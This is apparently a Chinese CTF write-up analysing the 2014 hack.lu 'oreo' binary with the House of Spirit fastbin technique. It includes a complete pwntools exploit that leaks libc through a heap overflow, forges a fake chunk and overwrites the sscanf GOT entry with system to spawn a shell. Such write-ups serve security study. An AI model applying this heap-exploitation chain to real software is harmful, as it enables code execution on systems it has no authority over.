house_of_spirit && 2014_hack.lu_oreo例题分析

最新推荐文章于 2022-02-14 14:24:18 发布
最新推荐文章于 2022-02-14 14:24:18 发布
阅读量1.2k 收藏 1
点赞数 1
分类专栏: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Pwnpanda/article/details/81637283
版权

2014_hack.lu_oreo

相关知识点:

Fastbin Attack – House of Spirit

相关链接:

2014_hack.lu_oreo下载

CTF Wiki Fastbin Attack

IDA创建结构体

题目分析:

先分析功能:

①添加枪支(add),这个地方会读取枪支的名字和描述,这是第一个难点,这个里面存在一个结构体(差点被坑死在这,为啥这个是一个结构体?大佬教我的是做多了就知道了)

通过代码可以看到在最初的时候分配了0x38个字节的堆块,又可以看到 ((_DWORD )dword_804A288 + 13) = v1,这个是一个32位的程序,所以一个指针占用4个字节,那么就可以得知之前那个堆块最后4个字节是用来存储一个新的指针(0x38 - 13 * 4 == 4),所以前面枪的名字和描述一共占用了52个字节,而名字是从dword_804A288 + 25开始的,所以枪支名字应该占用27个字节,枪支描述占用25个字节

int Add_rifle()
{
  char *v1; // [sp+18h] [bp-10h]@1
  int v2; // [sp+1Ch] [bp-Ch]@1

  v2 = *MK_FP(__GS__, 20);
  v1 = dword_804A288;
  dword_804A288 = (char *)malloc(0x38u);       
  if ( dword_804A288 )
  {
    *((_DWORD *)dword_804A288 + 13) = v1;       
    printf("Rifle name: ");
    fgets(dword_804A288 + 25, 56, stdin);      
    sub_80485EC(dword_804A288 + 25);
    printf("Rifle description: ");
    fgets(dword_804A288, 56, stdin);            
    sub_80485EC(dword_804A288);
    ++dword_804A2A4;
  }
  else
  {
    puts("Something terrible happened!");
  }
  return *MK_FP(__GS__, 20) ^ v2;
}

那么识别出的结构体应该就是这样 ↓

00000000 Rifle           struc ; (sizeof=0x38, mappedto_1)
00000000 name            db 27 dup(?)            ; string(C)
0000001B descript        db 25 dup(?)            ; string(C)
00000034 pre             dd ?                    ; offset
00000038 Rifle           ends

②显示已经输入的枪支的名字和描述(show_rifle);

③订购所有枪支,即释放所有已经添加的枪支信息(order);

④留下信息(message);

利用思路及exp分析:

①先利用程序“添加枪支”中存在的堆溢出漏洞,控制尾部指针,直接指向某个got表,那么在使用第二个展示的功能的时候,就能输出相应的内容,从而算出libc的基地址,再往后就可以算出system()函数和’/bin/sh’的地址

payload1 = 'a'*27+p32(elf.got['puts'])
add('a'*25,payload1)
show_rifle()
p.recvuntil('===================================\n')
p.recvuntil('Description: ')
puts_addr = u32(p.recvuntil('\n', drop=True)[:4])
log.success('puts_addr: '+hex(puts_addr))

libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search('/bin/sh'))
log.success('system_addr: '+hex(system_addr))
log.success('binsh_addr: '+hex(binsh_addr))

②在一开始我们就看到每次添加枪支都会申请一个大小为0x38的堆块,32位的程序,所有每个枪支堆块的实际大小是0x40,在使用message功能的时候,留下的信息会被输入到0x0804A2A8处,在0x0804A2A4处会记录已经添加的枪支堆块的数量,这里使用house of spirit技术,将堆块直接指向0x0804A2A8进行构造fake chunk,那么fake chunk的size就位于0x0804A2A4,大小为0x40,所以,为了绕过检测,我们需要申请0x40支枪支,并且编辑message的内容,message的内容应该是next fake chunk(相当于fake chunk 的next chunk)

num = 1
while num < 0x3f:
    add('a'*25,'a'*27)
    num += 1

payload2 = 'a'*27+p32(0x0804a2a8)
add('a'*25,payload2)

payload3 = '\x00'*0x20+p32(0x40)+p32(0x50)
message(payload3)

③根据上一步已经准备好的fake chunk,这一次应该是order功能,调用free()将堆块全部释放,然后当我们再次使用add功能添加枪支堆块的时候,根据fastbin机制,新申请的堆块就是从0x0804A2A8处开始的,我们可以在这个地方填充上sscanf()函数的got表,然后通过message功能,用system()函数的地址进行替换,那么再次调用sscanf()函数的时候就相当于调用system()函数,然后输入’/bin/sh’即可获得shell

sscanf_got = elf.got['__isoc99_sscanf']
add(p32(sscanf_got),'a')

message(p32(system_addr))
p.sendline('/bin/sh\0')

调试效果图:

可以从图上看到fake chunk和next fake chunk,同时也可以看出sscanf()的got表内容已经被替换成system()函数的地址
这里写图片描述

exp:

from pwn import *

p = process('./oreo')
elf = ELF("./oreo")
libc = ELF('./libc.so.6')
# context.log_level = 'debug'

def add(descrip, name):
    p.sendline('1')
    p.sendline(name)
    p.sendline(descrip)

def show_rifle():
    p.sendline('2')
    p.recvuntil('===================================\n')

def order():
    p.sendline('3')

def message(notice):
    p.sendline('4')
    p.sendline(notice)

payload1 = 'a'*27+p32(elf.got['puts'])
add('a'*25,payload1)
show_rifle()
p.recvuntil('===================================\n')
p.recvuntil('Description: ')
puts_addr = u32(p.recvuntil('\n', drop=True)[:4])
log.success('puts_addr: '+hex(puts_addr))

libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search('/bin/sh'))
log.success('system_addr: '+hex(system_addr))
log.success('binsh_addr: '+hex(binsh_addr))

num = 1
while num < 0x3f:
    add('a'*25,'a'*27)
    num += 1

payload2 = 'a'*27+p32(0x0804a2a8)
add('a'*25,payload2)

payload3 = '\x00'*0x20+p32(0x40)+p32(0x50)
message(payload3)
order()
p.recvuntil('Okay order submitted!\n')

sscanf_got = elf.got['__isoc99_sscanf']
add(p32(sscanf_got),'a')

message(p32(system_addr))
p.sendline('/bin/sh\0')

p.interactive()
Pwnpanda
关注
专栏目录
SMS.rar_android_android sms
09-21
- 从Android Oreo(8.0)开始,非默认的SMS应用无法在后台接收到短信广播。如果需要在后台运行,应用必须被用户设置为默认的SMS应用。 - 监听短信可能会涉及用户隐私,因此在设计功能时要尊重用户的选择,并明确...
2014 hack.lu——oreo
04-19 245
32位程序,没开PIE   #House Of Spirit 需要注意的是,该程序并没有进行 setvbuf 操作,因此在初次执行 io 函数时,会在堆上分配空间。 程序逻辑 1 unsigned int sub_804898D() 2 { 3 unsigned int v1; // [esp+1Ch] [ebp-Ch] 4 5 v1 =...
2014 hack.lu oreo
coco的博客
11-25 419
程序分析 这是一个经典的菜单程序 checksec add函数 建立了一个rifle结构体。 struct rifle { description //从0字节开始 name //从25字节开始 pre_rifle_ptr //从52字节开始 } //总共56字节 并且注意到description和name都能读入56个字节,也就是说pre_rifle_ptr是能被完全控制的。 并且有一...
house-of-spirit-pwn200
csdn546229768的博客
01-11 2569
前言 : 因为期末考试加上复习的原因,接近一个月没有做pwn题了,放寒假就回来在物理机上面装了个ubuntu(折腾了几天,不过装好了做题环境还是挺好用的),打算这个寒假学习完堆知识.来年好好上课(大三压力大!)有空打打比赛. 例题 : lctf2016_pwn200 house-of-spirit 利用条件: (1)想要控制的目标区域的上方空间与下方空间都是可控的内存区域 (2)存在可将堆变量指针覆盖指向为上方可控空间,从而达到将非可控空间与可控空间进行合并变成fake_chunk(有点像unlink) (
2014 hack.lu oreo house of sprit
m0_57754423的博客
02-14 231
什么是house of spirit? 简单说一下我自己的理解,详细的可以看wiki。 其核心在于在一个任意可写或间接可写的位置伪造一个fake_chunk,然后通过释放该fake_chunk,即可将该fake_chunk连入fastbin中,通过malloc达到分配指定地址chunk的目的。 看道例题2014 hack.lu oreo 漏洞点:存在堆溢出,chunk未完全free 利用思路: 1.泄露libc: add一个chunk,并且将该chunk的第13个地址位改为任意函数的g
CTF PWN Fastbin堆溢出入门
liucc09的博客
12-12 606
目标程序及EXP下载 解题思路 添加新武器时会在偏移52个字节的地方存下上一个武器的内存地址如下: *((_DWORD *)dword_804A288 + 13) = v1; //13个DWORD就是13*4=52字节 输入武器名时存在溢出,因此可以覆盖这个地址,指向另一片内存; 提交订单时会通过单向链表的方式free各个武器的内存区域,由于第1步中可以修改武器链表的上一个武器内存地址,因此可以释放一个我们指定的内存到fastbin中; 我们指定的内存肯定得是我们可以控制的内存,例如程序中的mess
google.tts.ophone8.zip_Google TTS_tts
09-20
"ophone8"可能指的是该版本适用于Android 8.0(Oreo)系统。"不支持中文"的描述意味着这个特定的测试包可能不包含对中文语言的支持。 Text-to-Speech(TTS)技术是信息技术领域的一个关键组件,尤其在可访问性、...
DolbyAtmos_Axon7_Oreo_Unity_2.20.18.zip
09-23
【标题】"DolbyAtmos_Axon7_Oreo_Unity_2.20.18.zip" 提供的是一个针对安卓8.0系统(代号Oreo)的杜比全景声(Dolby Atmos)模块,专为Axon 7智能手机设计。这个模块旨在增强手机的音频体验,通过Magisk框架进行安装...
sources-26_r01.zip
08-11
1. **Android API Level 26**:API Level 26对应的是Android 8.0 (Oreo)版本。开发者可以查看这个版本的系统服务、框架类和公共API的源代码,了解其内部工作原理。 2. **Android Framework**:源代码中会包含...
sources-27_r01.zip
08-11
3. **平台工具**:这部分包含了一系列命令行工具,如adb(Android Debug Bridge)用于设备连接与数据传输,fastboot用于固件更新,ddms(Dalvik Debug Monitor Service)提供性能分析和内存监控等功能。 4. **...
两种 fastbin attack 方法做 2014 hack.lu oreo
哒君的博客
07-31 633
终于第一次自己独立做出一道完整的堆题 方法一: ctf-wiki 很详细,不多赘述 方法二: 与 ctf-wiki 的思路类似,最终也是控制message的指针来达到任意地址写的目的 但是此处用的是 Arbitrary Alloc ,即控制fastbin块的fd指针来达成目的 具体请看exp的注释 exp: from pwn import * from LibcSearcher import ...
House_Of_Spirit ctf oreo程序分析
weixin_30551963的博客
07-02 179
oreo程序下载 提取码:t4xx 程序分析 int __cdecl main() { leave_add = 0; leave_del = 0; leave_buf = (char *)&unk_804A2C0; ... ... menu(); return 0; } main函数中先赋值了三个全局变量,这三个变量在.bss段是连续的 在这个程序中,...
unlink 2014 HITCON stkof
九层台
08-03 607
这里有一个很坑的问题,ubuntu18和之前的版本堆的管理策略好像不太一样网上说的关于堆的策略的问题可能对ubuntu18有些不太适用。 所以环境就从原本的18改为了16 关于unlink的介绍参考https://ctf-wiki.github.io/ctf-wiki/pwn/heap/unlink/ http://yunnigu.dropsec.xyz/2017/04/05/%E5%A0%...
LCTF 2016 PWN200(House Of Spirit)
Bill
03-24 1681
L-CTF 2016 pwn200 漏洞简介 The house of Spirit The House of Spirit is a little different from other attacks in the sense that it involves an attacker overwriting an existing pointer before it is ‘fr...
pwn 堆入门之fastbin attack
清霂的博客
04-02 327
目录floworeo b站原本有一个对堆基础讲的挺好的,好像叫pwn术进阶的堆溢出,但刚刚去看已经没了,好家伙,还好我刚看完,哈哈哈。 flow 涅普计划-ctf入门课堆溢出 #!/usr/bin/env python2 from pwn import * context(os="linux", arch="amd64", log_level="debug") #libc libc=ELF("libc.so.6") malloc_libc=libc.symbols['__malloc_hook'] m
Linux 堆溢出之fastbin实例
M021的专栏
11-11 3990
Linux下堆溢出 fastbin实例
Baby PHP - hacklu CTF 2018
stepone4ward的博客
07-13 733
代码审计
linux 堆溢出学习之house of spirit(1) malloc maleficarum hos翻译
jmp esp
03-02 2277
综述house of spirit是一种常用的堆溢出技术,而在如今的malloc实现中依然没有对这种方法进行保护,所以在目前还是一种有效的堆溢出技术。下面我们先从这种方法的来源之本讲起,即2005 Malloc Maleficarumcsdn原文 The House of SpiritThe House of Spirit is primarily interesting because of th
[pwn][堆利用]house of spirit[例题:lctf2016_pwn200]
zhulintintao的博客
11-21 818
House of spirit 实现目的 malloc分配到目标地址 实现条件 free的参数可控 目标地址可以连续构造两个fake chunk的size域,需要地址对齐(即目标高低地址处均有可控区域) 实现方法 在目标地址伪造可以被释放到fastbin上的fake chunk 伪造fake chunk的同时伪造好其下一个chunk(物理上的)的size域 将目标地址作为参数free malloc一次,将返回指向目标地址的指针 实现实例 题目平台 buuctf 题目名
android studio Build.VERSION_CODES.TIRAMISU
最新发布
09-14
`Build.VERSION_CODES.TIRAMISU` 代表着 Android 的一个特定版本,就像前面的版本如 `Build.VERSION_CODES.P`(Pie),`Build.VERSION_CODES.O`(Oreo)一样。 `Build.VERSION_CODES.TIRAMISU` 是从 Android 13 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值